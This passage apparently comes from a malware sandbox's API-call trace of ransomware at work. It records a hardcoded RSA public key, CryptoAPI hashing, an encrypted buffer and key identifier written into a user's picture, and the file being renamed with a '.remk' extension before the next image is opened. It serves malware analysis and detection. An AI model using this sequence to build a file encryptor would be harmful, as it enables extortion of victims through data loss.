KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.467] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.467] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.467] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x695278) returned 1 [0234.468] CryptCreateHash (in: hProv=0x695278, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0234.468] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0234.468] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0234.468] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0234.469] GetLastError () returned 0x0 [0234.469] CryptDestroyHash (hHash=0x31de170) returned 1 [0234.469] CryptReleaseContext (hProv=0x695278, dwFlags=0x0) returned 1 [0234.469] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0234.469] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0234.469] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0234.469] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0234.469] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0234.469] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.469] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0234.469] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xd940) returned 0x37c4278 [0234.469] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0234.470] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0234.470] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0234.470] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0234.470] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fd48 [0234.470] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0234.470] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325c3c8 [0234.470] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee7c0 [0234.470] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325c410 [0234.470] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee7d8 [0234.470] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee808 [0234.470] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee868 [0234.470] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee820 [0234.470] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0234.470] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0234.470] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0234.470] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0234.470] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee808 | out: hHeap=0x630000) returned 1 [0234.470] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee820 | out: hHeap=0x630000) returned 1 [0234.470] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee868 | out: hHeap=0x630000) returned 1 [0234.470] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0234.470] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0234.470] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee868 [0234.470] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0234.472] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee820 [0234.472] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0f28 [0234.472] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31ee808 [0234.472] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0234.472] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x3192918 [0234.472] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0234.472] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0234.472] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0234.472] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0234.472] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0234.472] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0234.472] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0234.472] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee820 | out: hHeap=0x630000) returned 1 [0234.472] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0234.472] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee808 | out: hHeap=0x630000) returned 1 [0234.473] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0234.473] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0234.473] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee868 | out: hHeap=0x630000) returned 1 [0234.473] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0234.473] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0234.473] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0234.473] GetCurrentThreadId () returned 0x314 [0234.473] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0234.473] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c3490 [0234.473] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0234.473] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0234.473] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0234.473] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0234.473] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0234.473] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0234.473] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.473] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.473] GetCurrentThreadId () returned 0x314 [0234.473] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.473] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.473] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x6a7330 [0234.473] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.474] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.474] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.474] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0234.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0234.474] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0234.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0234.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0234.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3195950 [0234.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0234.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee868 [0234.474] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0234.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0234.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0234.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0234.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0234.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0234.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0234.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0234.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee808 [0234.474] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0234.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0234.475] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0234.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0234.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0234.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0234.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0234.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee820 [0234.475] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0234.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0234.475] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0234.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee7f0 [0234.475] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0234.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee880 [0234.475] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0234.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0234.475] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0234.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee850 [0234.475] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0234.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee838 [0234.475] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0234.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee898 [0234.475] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee838 | out: hHeap=0x630000) returned 1 [0234.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee838 [0234.476] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee850 | out: hHeap=0x630000) returned 1 [0234.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed28 [0234.476] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0234.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0234.476] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0234.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0234.476] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee808 | out: hHeap=0x630000) returned 1 [0234.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee808 [0234.476] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0234.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x37c0db8 [0234.476] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee868 | out: hHeap=0x630000) returned 1 [0234.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0234.476] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee898 | out: hHeap=0x630000) returned 1 [0234.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37c0fc8 [0234.476] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0234.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x72aea0 [0234.476] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0234.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0234.476] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee808 | out: hHeap=0x630000) returned 1 [0234.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37b5b70 [0234.476] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0234.477] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x319bc40 [0234.477] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0234.477] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695278 | out: hHeap=0x630000) returned 1 [0234.477] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0234.477] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x319bc40 | out: hHeap=0x630000) returned 1 [0234.477] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0234.477] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0234.477] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0fc8 | out: hHeap=0x630000) returned 1 [0234.477] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0234.477] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0234.477] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0234.477] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee838 | out: hHeap=0x630000) returned 1 [0234.477] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0234.477] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee880 | out: hHeap=0x630000) returned 1 [0234.477] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0234.477] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee820 | out: hHeap=0x630000) returned 1 [0234.478] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee7f0 | out: hHeap=0x630000) returned 1 [0234.478] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bddc8 | out: hHeap=0x630000) returned 1 [0234.478] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0234.478] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0234.478] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee7d8 | out: hHeap=0x630000) returned 1 [0234.478] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c410 | out: hHeap=0x630000) returned 1 [0234.478] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0db8 | out: hHeap=0x630000) returned 1 [0234.478] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0234.478] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0234.478] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0234.478] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0234.478] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0234.478] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0234.478] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0234.478] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0234.478] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0234.478] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0234.478] WriteFile (in: hFile=0x640, lpBuffer=0x37c4278*, nNumberOfBytesToWrite=0xd93e, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37c4278*, lpNumberOfBytesWritten=0x3adfb14*=0xd93e, lpOverlapped=0x0) returned 1 [0234.478] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c4278 | out: hHeap=0x630000) returned 1 [0234.478] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xd943, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.479] WriteFile (in: hFile=0x640, lpBuffer=0x3192918*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x3192918*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0234.479] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0234.479] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711900 [0234.479] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0234.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0234.479] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x37c0db8 [0234.479] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0234.479] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711900 | out: hHeap=0x630000) returned 1 [0234.479] WriteFile (in: hFile=0x640, lpBuffer=0x37c0db8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x37c0db8*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0234.479] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0db8 | out: hHeap=0x630000) returned 1 [0234.479] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0234.479] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0234.479] CloseHandle (hObject=0x640) returned 1 [0234.482] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e698 [0234.482] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x37b5b70 [0234.482] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e698 | out: hHeap=0x630000) returned 1 [0234.482] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\55dO.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\55do.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\55dO.jpg.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\55do.jpg.remk")) returned 1 [0234.483] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0234.483] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.483] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0234.485] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0234.485] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2126c9b0, ftCreationTime.dwHighDateTime=0x1d5d9f6, ftLastAccessTime.dwLowDateTime=0xfe7147c0, ftLastAccessTime.dwHighDateTime=0x1d5da85, ftLastWriteTime.dwLowDateTime=0xfe7147c0, ftLastWriteTime.dwHighDateTime=0x1d5da85, nFileSizeHigh=0x0, nFileSizeLow=0x11c91, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="I1U5Uwz D.jpg", cAlternateFileName="I1U5UW~1.JPG")) returned 1 [0234.485] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0234.485] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xbe) returned 0x31c7810 [0234.485] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695278 | out: hHeap=0x630000) returned 1 [0234.485] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\I1U5Uwz D.jpg") returned=".jpg" [0234.485] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\I1U5Uwz D.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\i1u5uwz d.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0234.485] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=72849) returned 1 [0234.485] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, 